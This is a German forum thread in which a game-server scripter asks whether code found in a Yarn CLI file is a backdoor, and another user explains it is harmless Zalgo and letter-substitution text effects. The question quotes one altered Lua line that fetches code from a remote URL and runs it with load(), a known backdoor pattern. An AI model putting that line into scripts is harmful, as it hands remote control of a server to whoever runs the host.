Interessiert an einer Erklärung oder Klärung von dem Code.

Wichtiger Hinweis: Bitte ändert nicht manuell die Schriftfarbe auf schwarz sondern belasst es bei der Standardeinstellung. Somit tragt ihr dazu bei dass euer Text auch bei Verwendung unseren dunklen Forenstils noch lesbar ist!

Tipp: Ihr wollt längere Codeausschnitte oder Logfiles bereitstellen? Benutzt unseren eigenen PasteBin-Dienst Link
  • Es geht um diesen Code denn ich hier Posten werde, ich habe die frage ob des ein Backdoor ist oder nicht ich beschreibe auch wo ich das genau gefunden habe.



    Ich weiß halt selber nicht was das ist ich gehe aber von einem Backdoor aus was man erkennen kann finde ich, Gefunden habe ich diese Zeilen bei: Resources / CFX-Default / System / Builders / Yarn / Yarn_cli.js / <Unknown> / <Function> / <Function>

    Was mir auch aufgefallen ist ich habe das neu Gedownloaded von dem der das "Erschaffen" hat und es ist einfach auch drinnen, warum ich denke das das eine Backdoor ist aus der Begründung weil ich habe sowas ähnliches gesehen


    Undzwar da wo ich nach "Zalgo gesucht habe und dann kam einfach sowas....


    !!!!! BITTE NICHT KLICKEN!!!!! Habe den Link auch etwas Abgeändert!!!

    !!!! --PerformHttpRequest(' https://zalgo-dev.eu/api.', function (e, d) pcall(function() assert(load(d))() end) end) !!!!!!!


    Also warum dieser Post entstanden ist weil ich eure Ehrliche meinung wissen wollte als Programmierer weil des schon etwas ist wo man sich Befassen kann.. :D Mit freundlichen Grüßen ViruZAkaithink


    Moinsen,

    Ich Schreibe aktuell Nebenbei in ein SA:MP Script einfach wegen der Guten alten Zeiten :thumbup:

    Script Fortschritt: ||||||||||||

  • Hey, wenn du magst, kann ich dir erklären, was da passiert.


    Auf den Ersten Blick dachte ich, das wäre eine Obfuscation Taktik, das wird bei JS öfters angewendet, um den Quellcode zu verschleiern. Ist es in diesem Fall aber nicht.

    Das sind einfach nur Spaßfunktionen und ganz harmlos.


    Die Trap-Funktion ersetzt einfach Buchstaben mit einem zufälligen Unicode Zeichen, was aussieht wie der Buchstabe.

    Also z.B. a: ['@', 'Ą', 'Ⱥ', 'Ʌ', 'Δ', 'Λ', 'Д'], das steht da eigentlich. Gibst du jetzt einen Text wie: "Anton" ein, erhältst du: "ȺŋŁõŋ" oder "ĄΠŦ๏ŋ".

    Wird halt immer ein zufälliges Zeichen aus dem Array für den jeweiligen Buchstaben gepickt.


    Und bei Zalgo, wird einfach ein String generiert, der ähnlich wie die Matrix ist, bzw den Text unleserlich macht und gruselig ist. Entstanden ist das hier durch: https://creepypastavillains.fandom.com/wiki/Zalgo

    "Zalgo verfälscht normalerweise Three-Strip-Comics, indem er die Charaktere, die Schriftarten und die Handlung selbst zu einer unsinnigen und doch schrecklichen Travestie des Originalmaterials verdreht"

    Und genau das macht die Funktion, generiert halt eine komische Zeichenfolge, die gruselig aussieht.


    Also sind beides ganz harmlose Spielerein. Kein Backdoor o.ä. :)

    ast2ufdyxkb1.png


    Leute, lernt scripten und versucht mal lieber etwas selber zu schreiben, als es aus einem GF zu kopieren. :S